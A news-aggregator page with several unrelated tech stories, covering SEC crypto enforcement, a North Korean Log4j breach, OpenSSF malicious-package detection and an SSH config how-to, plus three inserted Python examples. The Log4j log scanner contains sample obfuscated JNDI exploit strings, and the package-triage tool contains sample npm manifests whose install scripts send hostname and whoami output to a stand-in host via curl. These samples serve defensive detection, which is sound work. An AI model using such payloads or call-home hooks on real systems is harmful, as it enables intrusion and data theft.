More stories


    SEC nearly doubles size of crypto and cyber enforcement unit

Written by Aimee Chanthadavong, Senior Journalist

Since completing a degree in journalism, Aimee has had her fair share of covering various topics, including business, retail, manufacturing, and travel. She continues to expand her repertoire as a tech journalist with ZDNet.

    Image: snjivo — Shutterstock
The US Securities and Exchange Commission (SEC) has announced that it will bolster the size of its enforcement unit that targets crypto assets and cyber-related threats.

The unit, formerly known as the Cyber Unit, will be renamed the Crypto Assets and Cyber Unit and will continue to reside in the Division of Enforcement. It will also gain 20 additional team members, taking the unit's total headcount to 50.

These additional roles will include fraud analysts, supervisors, investigative staff attorneys, and trial counsel, and are expected to focus on investigating violations related to crypto asset offerings, exchanges, lending and staking products, decentralized finance platforms, non-fungible tokens, and stablecoins.

"The US has the greatest capital markets because investors have faith in them, and as more investors access the crypto markets, it is increasingly important to dedicate more resources to protecting them," SEC chair Gary Gensler said. "The Division of Enforcement's Crypto Assets and Cyber Unit has successfully brought dozens of cases against those seeking to take advantage of investors in crypto markets. By nearly doubling the size of this key unit, the SEC will be better equipped to police wrongdoing in the crypto markets while continuing to identify disclosure and controls issues with respect to cybersecurity."

According to the SEC, since the unit's creation in 2017 it has brought more than 80 enforcement actions related to fraudulent and unregistered crypto asset offerings and platforms, resulting in fines totalling more than $2 billion.
One of the most recent of these cases came in February, when the SEC found that crypto lender BlockFi had operated for 18 months as an unregistered investment company.

The company offered BlockFi Interest Accounts (BIAs), under which users lent crypto assets to BlockFi in return for a variable monthly interest payment. The SEC found that these accounts were securities, and that BlockFi therefore needed to register with the regulator.

BlockFi was also found to have made a false and misleading statement on its site for over two years about the level of risk in its loan portfolio and lending activity.

Along with the findings, BlockFi agreed to pay a $50 million penalty to settle with the SEC and another $50 million to settle similar charges in 32 states. It also agreed to halt its unregistered products and to seek registration for its new lending product, and was given 60 days to bring its business into compliance.


    Hackers used the Log4j flaw to gain access before moving across a company's network, say security researchers

    A North Korean hacking and cyber-espionage operation breached the network of an engineering firm linked to military and energy organisations by exploiting a cybersecurity vulnerability in Log4j. First detailed in December, the vulnerability (CVE-2021-44228) allows attackers to remotely execute code and gain access to systems that use Log4j, a widely used Java logging library. The ubiquitous nature of Log4j meant cybersecurity agencies urged organisations globally to apply security updates as quickly as possible, but months on from disclosure, many are still vulnerable to the flaw. 


According to cybersecurity researchers at Symantec, one of those companies that was still vulnerable was an undisclosed engineering firm that works in the energy and military sectors. That vulnerability resulted in the company being breached when attackers exploited the flaw on a public-facing VMware View server in February this year. From there, attackers were able to move around the network and compromise at least 18 computers.

Analysis by Symantec researchers suggests that the campaign is the work of a group they call Stonefly, also known as DarkSeoul, BlackMine, Operation Troy, and Silent Chollima, an espionage group working out of North Korea. Other cybersecurity researchers have suggested that Stonefly has links with Lazarus Group, North Korea's most infamous hacking operation. But while Lazarus Group's activity often focuses on stealing money and cryptocurrency, Stonefly is a specialist espionage operation that researchers say engages in highly selective attacks "against targets that could yield intelligence to assist strategically important sectors", including energy, aerospace, and military.

"The group's capabilities and its narrow focus on acquiring sensitive information make it one of the most potent North Korean cyber-threat actors operating today," warn researchers at Symantec.

Stonefly has existed in some capacity since 2009, but in recent years it has doubled down on targeting highly sensitive information and intellectual property. This is achieved by deploying password-stealers and trojan malware on compromised networks. In the case of the undisclosed engineering firm, the first malware had been dropped onto the network within hours of the initial compromise.

Among the tools deployed in this incident was an updated version of Stonefly's custom Preft backdoor. The payload is delivered in stages. When fully executed, it becomes an HTTP remote access tool (RAT) capable of downloading and uploading files and information, along with the ability to download additional payloads and to uninstall itself when the malware is no longer needed. Alongside the Preft backdoor, Stonefly also deployed a custom-developed information-stealer that the attackers planned to use as an alternative means of exfiltration.

Stonefly has been active for over a decade and it's unlikely its attacks will stop soon, particularly as the group has a history of developing new tactics and techniques. While Stonefly is classified as a powerful state-backed hacking group, in this instance it didn't need advanced techniques to breach a network; it simply took advantage of an unpatched critical security vulnerability.

To help make sure known vulnerabilities like Log4j can't be exploited by state-backed hacking groups or cyber criminals, organisations should ensure that security updates for applications and software are rolled out as soon as possible. In the case of the firm above, this would have meant applying the patches VMware had published for the affected servers, which were available before the attack happened. Other controls, such as multi-factor authentication for users, can also help prevent attacks that use stolen passwords to move around networks.
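The intrusion above began with an exploitation attempt against a public-facing server, and such attempts leave a trace in that server's request logs. As an added example that is not part of the article or of Symantec's research, here is a small Python scanner for the lookup string that triggers CVE-2021-44228, a Log4j lookup of the form ${jndi:scheme://host/...}, including the nested-lookup, mixed-case and URL-encoding tricks attackers use to slip past a naive search for the literal "${jndi:". The access-log lines are constructed for the example and use RFC 5737 documentation addresses; the de-obfuscation models only the lower, upper and default-value lookups, which are the ones commonly abused.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Innermost ${...} lookup: one with no further braces inside it.
INNER = re.compile(r"\$\{([^{}]*)\}")
# The lookup that actually triggers the JNDI fetch, after de-obfuscation.
JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)

# Constructed access-log lines (RFC 5737 documentation addresses), not from the incident:
# a benign request, a plain probe in the User-Agent, a nested/case-obfuscated one,
# and a URL-encoded one in the query string.
SAMPLE_LOG = [
    '198.51.100.5 - - [15/Feb/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [15/Feb/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 882 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.7 - - [15/Feb/2022:10:02:41 +0000] "GET /portal/ HTTP/1.1" 200 882 "-" "${${lower:j}${upper:n}di:${::-l}dap://203.0.113.7:1389/a}"',
    '203.0.113.9 - - [15/Feb/2022:10:03:15 +0000] "GET /broker/xml?x=%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
]


def _fold(body: str) -> Optional[str]:
    """Evaluate one inner lookup the way Log4j 2's string substitution would,
    so that nested lookups collapse into the literal they hide. Returns None
    for a body that must stay as it is (the jndi lookup itself, or a lookup
    type this example does not model)."""
    low = body.lower()
    if low.startswith("jndi:"):
        return None
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:          # ${lookup:key:-default}: an unknown key yields the default
        return body.split(":-", 1)[1]
    return None


def normalize(text: str) -> str:
    """Undo URL encoding (twice, for double-encoded payloads), then repeatedly
    fold innermost lookups until only unfoldable ones remain."""
    text = unquote(unquote(text))
    while True:
        changed = False

        def repl(match):
            nonlocal changed
            folded = _fold(match.group(1))
            if folded is None:
                return match.group(0)
            changed = True
            return folded

        text = INNER.sub(repl, text)
        if not changed:
            return text


def scan_line(line: str) -> Optional[Dict[str, str]]:
    """Return the scheme and callback host of a JNDI lookup in the line, or None."""
    match = JNDI.search(normalize(line))
    if match is None:
        return None
    return {"scheme": match.group(1).lower(), "target": match.group(2), "raw": line}


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Scan a batch of log lines and keep only the hits."""
    return [hit for hit in map(scan_line, lines) if hit is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['scheme']:5} -> {hit['target']}")
```

The callback host and port extracted from each hit is the value worth pivoting on: an outbound LDAP or RMI connection from the application server to that address in proxy or firewall logs confirms that the lookup was evaluated, not merely logged.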


    Open-source security: It's too easy to upload 'devastating' malicious packages, warns Google

Google has detailed some of the work done to find malicious code packages that have been sneaked into bigger open-source software projects.

The Package Analysis Project is one of the software supply chain initiatives from the Linux Foundation's Open Source Security Foundation (OpenSSF) that should help automate the process of identifying malicious packages distributed on popular package repositories, such as npm for JavaScript and PyPI for Python. It runs a dynamic analysis of all packages uploaded to popular open-source repositories. It aims to provide data about common types of malicious packages and inform those working on open-source software supply chain security about how best to improve it.

"Unlike mobile app stores that can scan for and reject malicious contributions, package repositories have limited resources to review the thousands of daily updates and must maintain an open model where anyone can freely contribute. As a result, malicious packages like ua-parser-js, and node-ipc are regularly uploaded to popular repositories despite their best efforts, with sometimes devastating consequences for users," Caleb Brown of Google's Open Source Security Team explains in a blogpost.


"Despite open-source software's essential role in all software built today, it's far too easy for bad actors to circulate malicious packages that attack the systems and users running that software."

The Package Analysis project identified more than 200 malicious packages in one month, according to OpenSSF. For example, it found token theft attacks on Discord users that were distributed on PyPI and npm. The PyPI package "discordcmd", for example, attacks the Discord Windows client via a backdoor downloaded from GitHub and installed into the Discord app to steal Discord tokens.

Attackers distribute malicious packages on npm and PyPI often enough that OpenSSF, of which Google is a member, decided the problem needed to be addressed. In March, researchers found hundreds of malicious packages on npm that were used to target developers using Microsoft's Azure cloud, most of which were typosquatting and dependency confusion attacks. Both exploit the routine with which developers update large numbers of dependencies: typosquatting registers a package under a name one keystroke away from a popular one, while dependency confusion registers a public package with the same name as an organisation's internal, private package and an unusually high version number, so that a resolver which also checks the public registry prefers it over the internal copy.

OpenSSF says most of the malicious packages it detected were dependency-confusion and typosquatting attacks. But the project believes most of these are likely the work of security researchers participating in bug bounties. "The packages found usually contain a simple script that runs during install and calls home with a few details about the host. These packages are most likely the work of security researchers looking for bug bounties, since most are not exfiltrating meaningful data except the name of the machine or a username, and they make no attempt to disguise their behavior," OpenSSF and Google note.

OpenSSF notes that any of these packages "could have done far more to hurt the unfortunate victims who installed them, so Package Analysis provides a countermeasure to these kinds of attacks."

The recent Log4j flaw highlighted the general risks of software supply chain security in open source. The component was embedded in tens of thousands of enterprise applications and prompted a massive and urgent clean-up by the US government. Microsoft last week also highlighted the role of software supply chain attacks carried out by Russian state-backed hackers in connection with military attacks on Ukraine.

This February, Google and Microsoft pumped $5 million into OpenSSF's Alpha-Omega Project to tackle supply chain security. The Alpha side works with maintainers of the most critical open-source projects, while the Omega side will select at least 10,000 widely deployed open-source programs for automated security analysis.
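The three behaviours described above (a typosquatted name, a public package shadowing an internal one, and an install-time script that calls home) are simple enough to triage statically from a package manifest before anything is executed. The following Python example is added here and is not Package Analysis's own code (that project runs packages dynamically in a sandbox); it scores an npm package.json against those three signals. The manifests, the shortlist of popular names and the inventory of internal package names are all constructed for the example, and 203.0.113.5 is an RFC 5737 documentation address standing in for an attacker's callback host.

```python
import json
import re
from typing import Dict, List

# Constructed data for the example. A real check would load the popular set
# from registry download statistics and the internal inventory from the
# organisation's private registry.
POPULAR = {"lodash", "express", "react", "request", "ua-parser-js", "node-ipc", "colors"}
INTERNAL = {"acme-auth-client": "1.4.2", "acme-billing-sdk": "0.9.0"}   # hypothetical names

# npm lifecycle hooks that run during installation, and strings that suggest
# the hook reaches out to the network or collects host identity.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
CALL_HOME = re.compile(r"(curl|wget|nc |ncat|https?://|hostname|whoami|os\.userInfo|dns\.)", re.IGNORECASE)


def edit_distance(a: str, b: str) -> int:
    """Damerau-Levenshtein (optimal string alignment): a transposition such as
    lodahs/lodash costs one edit, which is the typical typosquat."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def semver(version: str) -> tuple:
    """Numeric (major, minor, patch) of a version string; pre-release and build tags ignored."""
    core = version.split("-", 1)[0].split("+", 1)[0]
    return tuple(int(part) for part in core.split(".")[:3])


def analyze(manifest_json: str) -> List[Dict[str, str]]:
    """Static triage of a package.json as it would be published to npm. Returns one
    finding per signal; an empty list means nothing suspicious by these checks."""
    m = json.loads(manifest_json)
    name, version = m.get("name", ""), m.get("version", "0.0.0")
    findings: List[Dict[str, str]] = []

    # Typosquatting: one edit away from a popular name, but not that name itself.
    for popular in sorted(POPULAR):
        if name != popular and edit_distance(name, popular) <= 1:
            findings.append({"kind": "typosquat", "detail": f"{name} resembles {popular}"})

    # Dependency confusion: a public package reusing an internal package's name.
    # A higher version is what makes a resolver prefer the public copy.
    if name in INTERNAL:
        higher = semver(version) > semver(INTERNAL[name])
        findings.append({"kind": "dependency-confusion",
                         "detail": f"{name}@{version} shadows internal {INTERNAL[name]}"
                                   + (" (higher version)" if higher else "")})

    # Install-time scripts that phone home, the pattern OpenSSF describes.
    for hook, script in m.get("scripts", {}).items():
        if hook in LIFECYCLE and CALL_HOME.search(script):
            findings.append({"kind": "install-hook", "detail": f"{hook}: {script}"})
    return findings


# Constructed manifests: a typosquat with a phoning-home postinstall, a public
# package squatting an internal name, and a clean package.
TYPOSQUAT = json.dumps({"name": "lodahs", "version": "4.17.21", "scripts": {
    "postinstall": "node -e \"require('http').get('http://203.0.113.5/?h='+require('os').hostname())\""}})
CONFUSION = json.dumps({"name": "acme-auth-client", "version": "99.0.0", "scripts": {
    "preinstall": "curl -s http://203.0.113.5/$(whoami)"}})
CLEAN = json.dumps({"name": "left-pad-utils", "version": "1.0.0", "scripts": {"test": "jest"}})

if __name__ == "__main__":
    for manifest in (TYPOSQUAT, CONFUSION, CLEAN):
        print(json.loads(manifest)["name"], analyze(manifest))
```

None of these checks replaces running the package under observation, which is what Package Analysis does; they are the cheap filter that decides which uploads deserve that sandbox time. The dependency-confusion check is the one worth wiring into a private registry, since it catches the attack at publication rather than at the first unlucky install.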


    Dell targets multi-cloud ecosystem with cyber recovery and data analytics

Written by Aimee Chanthadavong, Senior Journalist

    on May 2, 2022

    | Topic: Cloud

One year on from unveiling its Apex as-a-service portfolio, Dell Technologies is bolstering the portfolio to move beyond infrastructure and target more workload-based solutions, with the launch of Apex Cyber Recovery. The service is designed to streamline the deployment of cyber recovery solutions through standardised configurations and recovery options.

"With Apex Cyber Recovery, customers can feel confident in the ability to recover from a destructive cyber attack and achieve more agility by offloading the day-to-day management of data protection. Customers get more resiliency from an isolated, immutable, and intelligent data vault," Dell Apex product management vice president Chad Dunn told media during a briefing on Apex.

Apex Cyber Recovery is initially being made available in the US, with plans for broader availability later this year.

The tech giant is also extending its reach in the multi-cloud ecosystem, starting with the release of PowerProtect Cyber Recovery for Microsoft Azure on the Azure Marketplace. Dell said it will allow organisations to deploy an isolated cyber vault in the public cloud, so that if recovery is necessary they can recover back to their main corporate data centre, an Azure private network, or a clean environment within Azure.

The release comes off the back of Dell recently delivering a similar offering for Amazon Web Services (AWS). On AWS, Dell has announced the launch of CyberSense on AWS Marketplace, which uses analytics, metadata, and machine learning to proactively detect, diagnose, and speed up data recovery after an attack, as well as to identify the last known uncorrupted copy of data to recover from. Both PowerProtect Cyber Recovery for Microsoft Azure and CyberSense for Dell PowerProtect Cyber Recovery for AWS will be globally available in Q2.

Additionally, Dell has drummed up a new strategic partnership with Snowflake, so that joint customers can for the first time use Snowflake's cloud-based analytics on on-premise data and gain more insights. Jon Siegal, the company's ISG product marketing VP, explained that customers will be able to connect Dell's object storage to Snowflake in two ways.

"The first way is by running Snowflake analytics against Dell's on-premise object storage without moving the data to the cloud ... it's really for customers who don't want to move their data to the cloud, whether it's for compliance, security, control, data sovereignty reasons," he said. "Secondly, customers that have the ability also to connect their on-prem Dell object storage to Snowflake by simply copying Dell's on-premises object data to the Snowflake cloud, so it can be analysed in Snowflake's cloud itself."

Dell also took the opportunity to provide an update on Project Alpine, which was introduced at the start of the year. Siegal said that from the second half of this year, Dell will be introducing data mobility and the same consistent management experience across on-premise and public cloud environments. He added that customers will be able to "power up" their multi-cloud environments by leveraging the data services capabilities found in Dell's storage platforms, such as PowerStore, PowerScale, PowerFlex, and ObjectScale.


    How to make SSH even easier to use with config files

Written by Jack Wallen, Contributing Writer

Jack Wallen is what happens when a Gen Xer mind-melds with present-day snark. Jack is a seeker of truth and a writer of words with a quantum mechanical pencil and a disjointed beat of sound and soul.

Secure Shell (SSH) is one of those tools every Linux user will probably work with at some point. With SSH you can easily (and securely) log into remote servers and desktops to administer, develop, and check up on those machines.

Using SSH is as simple as:

ssh jack@192.168.1.11

Or even just:

ssh 192.168.1.11

Of course, you would exchange the IP address for the address (or domain) of the machine you need to access.


SSH gets a bit less simple when you have numerous machines you access with different configurations (such as different usernames or SSH authentication keys). Imagine if you had 20 or so different servers you had to log into daily. Not only would you have to keep track of the IP addresses or domains of those servers, but you'd also have to remember which usernames or authentication keys were used. That alone could get rather overwhelming.

Thankfully, SSH allows you to create a config file to house all of that information. So, instead of having to type something like ssh olivia@192.168.1.100 -p 2222, you could simply type ssh web1. Let me show you how this is done.

Creating the SSH config file

Log in to the Linux machine you use to SSH into all of those remote machines. Open a terminal window and create the new configuration file in your editor (Figure A shows this done with nano):

nano ~/.ssh/config

Figure A: Creating the new SSH config file with the help of nano.

Since this is a new file, it'll be a blank canvas to which we can start adding configurations for servers. Let's say you want to configure the following remote servers:

web1 at 192.168.1.100 with user olivia
db1 at 192.168.1.101 with user nathan and SSH key ~/.ssh/id_nathan
docker1 at 192.168.1.102 with user lilly on port 2222

Our first entry will look like this:

Host web1
    Hostname 192.168.1.100
    User olivia

If you save and close the file at this point, you could SSH into 192.168.1.100 with the command:

ssh web1

Let's go ahead and configure the next two entries, which will look like this:

Host db1
    Hostname 192.168.1.101
    User nathan
    IdentityFile ~/.ssh/id_nathan
    PubkeyAuthentication yes

Host docker1
    Hostname 192.168.1.102
    User lilly
    Port 2222

Save and close the file. Because ssh refuses to read a config file that other users can write to, make sure it is readable and writable only by you:

chmod 600 ~/.ssh/config

You can now secure shell into those machines with the commands:

ssh web1
ssh db1
ssh docker1

You can use whatever nickname you need for each host; just make them memorable, so you don't forget which machine you're trying to reach and have to constantly reference the config file to jog your memory.

Let's say, however, that you use the same username on all your remote servers, but a different username on your local machine. For example, your local machine username might be jack, but you've created the admin user on all of your remote servers. You could cover all of those servers with a single wildcard entry. Two details of how SSH reads the file matter here. First, a Host pattern is matched against the name you type on the command line (the nickname), not against the Hostname it maps to, so a pattern such as 192.168.1.* would never match ssh web2. Second, SSH uses the first value it finds for each option, so general defaults belong at the bottom of the file and host-specific entries above them. A wildcard entry that matches every nickname therefore looks like this, and goes at the end of the config file:

Host *
    User admin

You could then configure each server individually as needed, leaving out the User option. For example, if both servers at 192.168.1.200 and 192.168.1.201 use SSH key authentication, you could configure entries like so, above the Host * block:

Host web2
    Hostname 192.168.1.200
    IdentityFile ~/.ssh/id_admin
    PubkeyAuthentication yes

Host web3
    Hostname 192.168.1.201
    IdentityFile ~/.ssh/id_admin
    PubkeyAuthentication yes

Because the Host * entry applies user admin to every connection that did not already get a User, ssh web2 and ssh web3 will log in as admin. To override that default for one machine, add a User line to that machine's own entry, which sits above the wildcard and is therefore read first. You can confirm what SSH will actually use for any nickname, without connecting, with ssh -G web2.

The SSH config file allows for several other options (all of which are described in the ssh_config man page), but the examples shown above should be everything you need to get going with the SSH config file. And that's all there is to using the SSH config file to help make your remote access with Secure Shell even easier.
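To see how those two rules play out (Host patterns are matched against the name you type, and the first value found wins), here is an added Python example that is not part of the article. It reads a config in the format above and resolves the options ssh would use for a given nickname. It is a simplification of ssh's own matching: only the * and ? wildcards and a leading ! for negation are supported, and Match blocks, Include and Key=Value syntax are not modelled. The config texts and host names are constructed for the example; one of them deliberately repeats the mistake of matching on the IP address, and another puts the wildcard block first, to show what silently goes wrong.

```python
import fnmatch
import shlex
from typing import Dict, List, Tuple

Block = Tuple[List[str], Dict[str, str]]

# Constructed config in the layout the article arrives at: host-specific entries
# first, the wildcard defaults last.
GOOD_CONFIG = """
Host docker1
    Hostname "192.168.1.102"
    User lilly
    Port 2222

Host web2
    Hostname 192.168.1.200
    IdentityFile ~/.ssh/id_admin

Host web3
    Hostname 192.168.1.201
    User deploy
    IdentityFile ~/.ssh/id_admin

# General defaults belong at the end: ssh keeps the first value it finds.
Host *
    User admin
    Port 22
"""

# Wildcard block placed first: the per-host User below it can never take effect.
BAD_ORDER_CONFIG = """
Host *
    User admin

Host web3
    Hostname 192.168.1.201
    User deploy
"""

# Pattern written against the IP address: it only matches when the IP is typed.
IP_PATTERN_CONFIG = """
Host 192.168.1.*
    User admin

Host web2
    Hostname 192.168.1.200
"""


def parse_config(text: str) -> List[Block]:
    """Split ssh_config text into (host patterns, options) blocks in file order.
    Options that appear before any Host line apply to every host."""
    blocks: List[Block] = [(["*"], {})]
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = shlex.split(line)            # tolerates the quoted values in the article
        keyword, args = parts[0].lower(), parts[1:]
        if keyword == "host":
            blocks.append(([a.lower() for a in args], {}))
        elif args:
            blocks[-1][1].setdefault(keyword, args[0])   # first value wins, even within a block
    return blocks


def host_matches(patterns: List[str], cli_host: str) -> bool:
    """Match the way ssh does: against the name typed on the command line, not
    against Hostname. Simplified to '*' and '?' wildcards plus '!' negation."""
    cli_host = cli_host.lower()
    matched = False
    for pattern in patterns:
        if pattern.startswith("!"):
            if fnmatch.fnmatchcase(cli_host, pattern[1:]):
                return False                 # a negated match vetoes the whole block
        elif fnmatch.fnmatchcase(cli_host, pattern):
            matched = True
    return matched


def resolve(text: str, cli_host: str) -> Dict[str, str]:
    """Effective options for `ssh cli_host`: walk the blocks in order and keep
    the first value seen for each keyword, as ssh's config reader does."""
    effective: Dict[str, str] = {}
    for patterns, options in parse_config(text):
        if host_matches(patterns, cli_host):
            for keyword, value in options.items():
                effective.setdefault(keyword, value)
    effective.setdefault("hostname", cli_host)   # no Hostname: connect to the name typed
    return effective


if __name__ == "__main__":
    for cfg, host in ((GOOD_CONFIG, "web2"), (GOOD_CONFIG, "web3"),
                      (BAD_ORDER_CONFIG, "web3"), (IP_PATTERN_CONFIG, "web2")):
        print(host, "->", resolve(cfg, host))
```

Running it shows web2 picking up User admin and Port 22 from the trailing Host * block while web3 keeps its own deploy user; with the wildcard moved to the top, web3's override is lost, and with the 192.168.1.* pattern, ssh web2 gets no User at all. The real ssh -G web2 prints the same resolved values for a real config file, and is the quicker check once the file is in place.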



    Mozilla finds mental health apps fail 'spectacularly' at user security, data policies

    An investigation into mental health and prayer apps has revealed a disturbing lack of concern surrounding user security and privacy.

On Monday, Mozilla released the findings of a new study into these types of apps, which often deal with sensitive topics including depression, mental health awareness, anxiety, domestic violence, PTSD, and more, alongside religion-themed services.

According to Mozilla's latest *Privacy Not Included guide, despite the deeply personal information these apps manage, they "routinely share data, allow weak passwords, target vulnerable users with personalized ads, and feature vague and poorly written privacy policies."

In a study of 32 applications geared toward mental health and religion, the organization found that 25 of them did not meet Mozilla's Minimum Security Standards. These standards act as a benchmark for the *Privacy Not Included reports. The mismanagement or unauthorized sharing and sale of user data, vague data management policies, a lack of encryption, weak password policies, no clear vulnerability management system, and other lax security practices can all downgrade a vendor's product in the eyes of Mozilla. If an app or service fails to meet these basic requirements, it is slapped with the "*Privacy Not Included" warning label.

The mental health and prayer-related apps have received an accolade, but not one you'd covet. The company says: "When it comes to protecting people's privacy and security, mental health and prayer apps are worse than any other product category Mozilla researchers have reviewed over the past six years."

The organization examined apps including Talkspace, BetterHelp, Calm, Glorify, 7 Cups, Wysa, Headspace, and Better Stop Suicide. As a result, each app now has a dedicated page where users can find out more about the software's privacy and security rating.

For example, Better Stop Suicide, a suicide prevention app, failed Mozilla's test. "Holy vague and messy privacy policy Batman! Better Stop Suicide's privacy policy is bad," Mozilla says. "Like, get a failing grade from your high school English teacher bad." While the app gathers some personal information and says that users can reach out if they have further queries, the developers did not respond to Mozilla's attempts at contact and did not say who the "trusted partners" it shares data with are.

Only two applications on the list, PTSD Coach and the AI chatbot Wysa, seemed to take data management and user privacy seriously.

"The vast majority of mental health and prayer apps are exceptionally creepy," commented Jen Caltrider, Mozilla's *Privacy Not Included lead. "They track, share, and capitalize on users' most intimate personal thoughts and feelings, like moods, mental state, and biometric data. Turns out, researching mental health apps is not good for your mental health, as it reveals how negligent and craven these companies can be with our most intimate personal information."


    Directorate of Enforcement seizes $725 million from Xiaomi India

    Image: Xiaomi
India's anti-money laundering agency, the Directorate of Enforcement (ED), has seized assets worth ₹5551.27 crore (around $725 million) from Xiaomi India after it found the company had broken foreign exchange laws.

The company began operations in India in 2014 and is alleged to have commenced the illegal activity in 2015. The ED claimed that Xiaomi India remitted foreign currency to three offshore entities under the guise of royalties, one of which was a company within the Xiaomi group, while the other two were US-based. Further, the ED stated that the payments were made "on the instructions of their Chinese parent group entities".

Xiaomi India responded via Twitter, claiming that its financial processes are compliant with Indian laws and regulations.

"We believe our royalty payments and statements to the bank are all legit and truthful," the company said in its response. "These royalty payments that Xiaomi India made were for the in-licensed technologies and IPs used in our Indian version products. It is a legitimate commercial arrangement for Xiaomi India to make such royalty payments." Xiaomi India did, however, commit "to working closely with government authorities to clarify any misunderstandings".

After experiencing 83% year-on-year growth during the second quarter of 2021, parent company Xiaomi achieved a 17% share of the smartphone market, surpassing Apple, and eventually Samsung, to briefly take the number one spot in the global smartphone market, according to Counterpoint Research.


    Robo-debt Royal Commission, eSafety capabilities and anti-trolling laws on the Australian election agenda

Written by Aimee Chanthadavong, Senior Journalist

Investing over AU$33 million to enhance eSafety capabilities and legislating the proposed anti-trolling laws are just some of the policies the Coalition government has pledged to follow up if it is re-elected at the upcoming federal election on May 21.

Specifically, the policy includes AU$23 million to raise awareness of the eSafety Commissioner's support for Australian schools, provide training programs for teachers, improve online safety resources for schools, and enhance support for schools with external online safety providers. It also includes an additional AU$10 million for the eSafety Commissioner to further expand coordination with other regulatory and law enforcement agencies, ensuring victims "tell us once" and are supported with the right service.

Additionally, the Morrison government said it will continue to stick with legislating the proposed anti-trolling laws, touting that they will ensure social media companies are held accountable, while Australians are given more power to deal with harmful defamatory comments from anonymous trolls. The proposed laws, however, have been blasted by senators, online abuse victims, and organisations including the eSafety Commissioner for being too hard to access and unclear, and would require more work if they are to become law.

The government said it also wants to introduce a binding industry code under the Online Safety Act to ensure smartphones and tablet devices have "strong" parental controls installed that are easier to find and activate, and harder for kids to bypass, if industry does not act within 12 months. An additional AU$2 million has also been earmarked under the Online Safety Grants for online safety projects that support women and girls in culturally and linguistically diverse communities.

"Our kids should be able to learn, be entertained, or connect with their friends and family without facing abuse, humiliation or online predators. The online world cannot be a cowards' cavern where the rules of the real world do not exist," Prime Minister Scott Morrison said. "Big tech and social media giants must be held to account. Our plan will force them to do more – they cannot create it, and wash their hands of all consequences of it.

"Our plan will also ensure parents can protect their kids online with strong parental controls, help to prevent harm by raising awareness in every school, and improve our support for those harmed online."

At the same time, the government said new funding of AU$3.8 million, delivered through the 2022-23 Budget, would be handed to youth mental health organisation Batyr to expand its OurHerd digital platform, which aims to provide young people with a safe digital space to view and learn from positive mental health stories shared by peers. The funding would build on the government's previous investment of AU$2.8 million through the 2019-20 Budget to develop OurHerd.

Minister for Health and Aged Care Greg Hunt said the additional funding for OurHerd will support approximately 60,000 young people aged 14-30 with mild to moderate mental health needs, as well as their families, carers, and communities. "Through peer-to-peer education and the sharing of stories of lived experience, Batyr is helping more young people to get help before they reach a crisis point," Hunt said. "This early support reduces the lifelong impacts of mental illness and saves lives."

Meanwhile, the Opposition, as part of its election campaign, has vowed to establish a Royal Commission into robo-debt by the end of this year, with consultation to begin after the election. It envisions the Royal Commission will identify who was responsible for the robo-debt scheme; establish what advice and what processes informed its design and implementation; investigate the handling of complaints about the scheme; determine how much the implementation, suspension, and wind-back of the scheme cost taxpayers; investigate the harm caused to Australians; and investigate the use of third-party debt collectors under the scheme.

Labor has been advocating for a Royal Commission into the government's robo-debt disaster since June 2020.

"We still do not know how this reckless scheme was unleashed. We do not know whether poor legal advice was given or whether legal advice was simply never sought," Shadow Minister for Government Services Bill Shorten said. "We do not know if public servants were inappropriately heavied and politicised. And without knowing the true origins we do not know what safeguards could be put in place to prevent a repeat."

In May 2020, the federal government conceded its data-matching Online Compliance Intervention (OCI) initiative, dubbed robo-debt, got around 470,000 "debts" wrong. The OCI program automatically compared the income declared to the Australian Taxation Office (ATO) against income declared to Centrelink, and issued debt notices, along with a 10% recovery fee, whenever a disparity in government data was detected. From 1 July 2016 through 31 August 2019, Centrelink's OCI program initiated 1,159,662 assessments using the automated data-matching technique.

Separately, the Opposition also said it will launch a user audit of the myGov government services digital portal to "take a fresh look" at how well it is performing and help identify what changes and improvements can be made.

"Millions of Australians interact with myGov every day and rely on it to provide essential services. It's not up to scratch, and Australians deserve better. That's why we will review myGov, and make improvements where necessary," Opposition leader Anthony Albanese said.